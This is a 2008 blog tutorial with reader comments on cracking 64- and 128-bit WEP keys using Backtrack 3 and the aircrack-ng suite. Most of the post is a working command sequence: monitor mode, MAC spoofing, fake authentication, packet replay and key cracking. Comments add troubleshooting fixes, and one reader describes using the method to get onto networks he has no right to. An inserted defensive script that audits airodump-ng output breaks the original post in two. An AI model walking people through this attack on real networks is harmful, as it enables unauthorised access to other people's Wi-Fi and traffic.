Tutorial: Cracking WEP Using Backtrack 3
Whats the w0rd? | 19 Aug 2008 | Author: Maz | Writing about: Hacking, Informational, Tips and Tricks, lifehacking, mobile, software, technical support

Standard Disclaimer: This article is provided for informational purposes only. thew0rd.com and its affiliates accept no liability for providing this information. Please only use to test configurations on your own equipment. Accessing WIFI networks that do not belong to you is ILLEGAL.

This article will explain how to crack 64-bit and 128-bit WEP on many WIFI access points and routers using Backtrack, a live Linux distribution. Your mileage may vary.

The basic theory is that we want to connect to an access point using WEP encryption, but we do not know the key. We will attack the WIFI router, making it generate packets for our cracking effort, and finally crack the WEP key. I have tested this technique on an IBM Thinkpad x60 and an Acer 5672; the WIFI chipsets in those machines work for sure.

Requirements:

- Backtrack 3 on CD or USB
- Computer with a compatible 802.11 wireless card
- Wireless access point or WIFI router using WEP encryption

I will assume that you have downloaded and booted into Backtrack 3. If you haven't figured that part out, you probably shouldn't be trying to crack WEP keys. Once Backtrack is loaded, open a shell and do the following:

Preparing The WIFI Card

First we must enable "Monitor Mode" on the WIFI card. If using the Intel PRO/Wireless 3945ABG chipset, issue the following commands:

    modprobe -r iwl3945
    modprobe ipwraw

The above commands will enable monitor mode on the wireless chipset in your computer. Next we must stop your WIFI card. First list the adapters:

    iwconfig

Take note of your wireless adapter's interface name.
Then stop the adapter by issuing:

    airmon-ng stop [device]

Then bring the interface down (the interface name comes before "down"):

    ifconfig [interface] down

Now we must change the MAC address of the adapter:

    macchanger --mac 00:11:22:33:44:66 [device]

It's now time to start the card in monitor mode by doing:

    airmon-ng start [device]

Attacking The Target

It is now time to locate a suitable WEP-enabled network to work with:

    airodump-ng [device]

Be sure to note the MAC address (BSSID), channel (CH) and name (ESSID) of the target network. Now we must start collecting data from the WIFI access point for the attack:

    airodump-ng -c [channel] -w [network.out] --bssid [bssid] [device]

The above command writes the collected data to files prefixed with network.out (the capture itself ends up in network.out-01.cap). This file will be fed into the WEP crack program when we are ready to crack the WEP key. Open another shell and leave the previous command running.

Now we need to generate some fake packets to the access point to speed up the data output. Test the access point by issuing the following command:

    aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]

If this command is successful we can now generate many packets on the target network so that we can crack the key. Type:

    aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]

This will force the access point to send out a bunch of packets which we can then use to crack the WEP key. Check your airodump-ng shell and you should see the "data" column filling up with packets. After about 10,000-20,000 you can begin cracking the WEP key.

If there are no other hosts on the target access point generating packets, you can try:

    aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]

Once you have enough packets, begin the crack:

    aircrack-ng -n 128 -b [bssid] [filename]-01.cap

The "-n 128" signifies a 128-bit WEP key. If cracking fails, try a 64-bit key by changing the value of -n to 64. Once the crack is successful you will be left with the key! Remove the colons from the output and there is your key.
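From the defender's side, the same airodump-ng output this tutorial relies on can be turned into an audit of your own network. The script below is an added example, not code from the original post: it parses the CSV summary that airodump-ng writes beside the .cap file, lists every access point still advertising WEP together with its captured IV count, and flags clients whose frame count toward a WEP access point matches the replay traffic described above. The CSV sample is constructed, and the 10,000-frame threshold is an assumption.

```python
"""Audit an airodump-ng CSV summary: list APs still using WEP and flag clients
whose frame counts look like the packet replay this tutorial describes."""

# Constructed sample in the layout of airodump-ng's prefix-01.csv: an AP table,
# a blank line, then a station table. Every value here is made up for the example.
SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:AA:BB:CC, 2008-08-19 12:00:00, 2008-08-19 12:10:00,  6, 54, WEP, WEP, OPN, -40, 600, 18500, 0.  0.  0.  0, 7, homenet, 
00:11:22:AA:BB:DD, 2008-08-19 12:00:00, 2008-08-19 12:10:00, 11, 54, WPA2, CCMP, PSK, -55, 590, 0, 0.  0.  0.  0, 6, office, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:11:22:33:44:66, 2008-08-19 12:01:00, 2008-08-19 12:10:00, -50, 31200, 00:11:22:AA:BB:CC, homenet
00:1A:2B:3C:4D:5E, 2008-08-19 12:00:30, 2008-08-19 12:10:00, -48, 210, 00:11:22:AA:BB:CC, 
"""


def parse_sections(text):
    """Split the dump on blank lines; each section becomes a list of dicts keyed
    by its header row. ESSIDs are assumed not to contain commas."""
    tables, rows = [], []
    for line in text.splitlines():
        if line.strip():
            rows.append([cell.strip() for cell in line.split(",")])
        elif rows:
            tables.append([dict(zip(rows[0], r)) for r in rows[1:]])
            rows = []
    if rows:
        tables.append([dict(zip(rows[0], r)) for r in rows[1:]])
    return tables


def audit(text, replay_threshold=10000):
    """Return (wep_aps, suspicious). wep_aps maps BSSID -> (ESSID, IV count) for
    every AP whose Privacy column says WEP; suspicious lists (station MAC, BSSID,
    packets) for clients of a WEP AP that sent more than replay_threshold frames,
    the traffic footprint aireplay-ng style injection leaves in the station table."""
    tables = parse_sections(text)
    aps = tables[0] if tables else []
    stations = tables[1] if len(tables) > 1 else []
    wep_aps = {ap["BSSID"]: (ap["ESSID"], int(ap["# IV"] or 0))
               for ap in aps if "WEP" in ap["Privacy"]}
    suspicious = [(st["Station MAC"], st["BSSID"], int(st["# packets"] or 0))
                  for st in stations
                  if st["BSSID"] in wep_aps and int(st["# packets"] or 0) > replay_threshold]
    return wep_aps, suspicious


if __name__ == "__main__":
    for bssid, (essid, ivs) in audit(SAMPLE_CSV)[0].items():
        print(f"WEP still in use: {essid} ({bssid}), {ivs} IVs seen")
```

Point it at the real prefix-01.csv from your own capture to get the same two lists for your network.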
So there you have it. You can use these techniques to demonstrate to others why using WEP is a bad idea. I suggest you use WPA2 encryption on your wireless networks. Good luck!

19 Responses to "Tutorial: Cracking WEP Using Backtrack 3"

Emrikol said, 8-20-2008:
Thanks Maz! You're a lifesaver. I spent a while trying to do this with russix and I couldn't get it. (Crazy mother-in-law is too cheap to buy internet, she moved, and her new place only has encrypted signals... luckily WEP.)

Anon said, 8-21-2008:
Or you could just buy your web access and not be fucking people over for bandwidth etc.

nico said, 8-21-2008:
Good tut. Next you might want to share with your readers about packet injection and Kismet for sniffing. I don't know if they bundle Kismet with BT3 now but I know it was in BT2. Thanks.

Registered99 said, 8-22-2008:
There is no macconfig?

    macconfig: command not found

Maz said, 8-22-2008:
@Registered99 Thanks for pointing out the mistake, the actual command is macchanger and I'm updating the post as I write this. Good luck!

dubpluris said, 8-22-2008:
Thanks a lot. I don't really even plan on using this, but it was very informative and clear. Thanks for the effort.

keen said, 8-22-2008:
I personally do not worry if someone hacks into my router to go online. What worries me is when the intentions go further: breaking into my desktop or using my connection to do bad things, which would get me a surprise knock on the door from the FBI. This is a darn good reason I remain connected with troublesome hard wiring or stick to the old b-version router.

justgeig said, 8-24-2008:
Just wondering what your thoughts are on hiding/not broadcasting the SSID... decently secure or no?

Maz said, 8-24-2008:
@justgeig If there are active clients on an AP with a hidden SSID, you can usually see it when running airodump-ng by comparing the MAC of the hidden AP with the MAC on packet captures. So generally, it doesn't offer much more security. Might just be a speed bump in some situations.

JodoKaast said, 8-27-2008:
aircrack-ng also has the PTW algorithm attack, which needs far fewer IVs to successfully decrypt a WEP key. You can invoke it using the '-z' switch with aircrack-ng. I've cracked a 128-bit WEP key with only about 40000 IVs.

Nick said, 8-29-2008:
I have done exactly as you told. My wifi chipset is Intel PRO/Wireless 3945ABG. The problem is that after I use

    aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]

I get no packets from my access point. Then I use:

    aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]

After this I get many packets, but like 50000 packets have only 1 IV. The access point I'm testing on is Dynalink_Datron. Hope someone can help.

jones said, 9-5-2008:
Having trouble cracking the WEP key at my house. After performing this command

    aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]

the output for dest mac is ff:ff:ff:ff:ff:ff, but according to your tutorial the dest mac is the fake mac. So when I try to decrypt the packets it fails looking for keys and says try with 5000 IVs.

Maz said, 9-5-2008:
@jones Hey, check out the following site for more information about Interactive Packet Replay: http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay Hopefully that will give you a little more background and assist you in your efforts. Good luck!

Goatse said, 9-7-2008:
Great tutorial, scary.

moosacha said, 9-11-2008:
"aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]"
If you use interactive packet replay, wouldn't you need to capture a lot more than just 20,000 packets in order to successfully attempt to crack? As far as I know what you'll be capturing won't be ARP packets, so the PTW method will not work for you. You'll probably need to capture about 1,500,000 IVs before having a good chance of getting the key. Or am I mistaken?

josh said, 9-12-2008:
Hey, great tut. Just one question: when I run the ifconfig down [wifi0] command I get an error, something like "interface not found", but when I run airmon-ng stop [device] it says the interface is wifi0, so I'm pretty sure it's the right interface. BTW, interface and device are the same thing on my machine. Oh, and last thing: how do you get out of monitor mode?

croakey said, 9-18-2008:
This tutorial is wonderful and worked for me! This line however needed the following changes to work for me.

before:

    airodump-ng -c [channel] -w [network.out] –bssid [bssid] [device]

after:

    airodump-ng -c [channel] -w [network.out] --bssid [bssid] [device]